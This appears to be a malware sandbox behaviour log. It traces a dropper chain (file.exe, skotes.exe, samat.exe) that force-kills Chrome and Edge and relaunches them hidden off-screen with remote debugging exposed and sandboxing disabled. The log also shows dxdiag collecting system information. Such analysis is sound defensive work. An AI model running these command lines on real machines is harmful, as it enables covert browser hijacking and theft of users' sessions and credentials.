                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txtJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
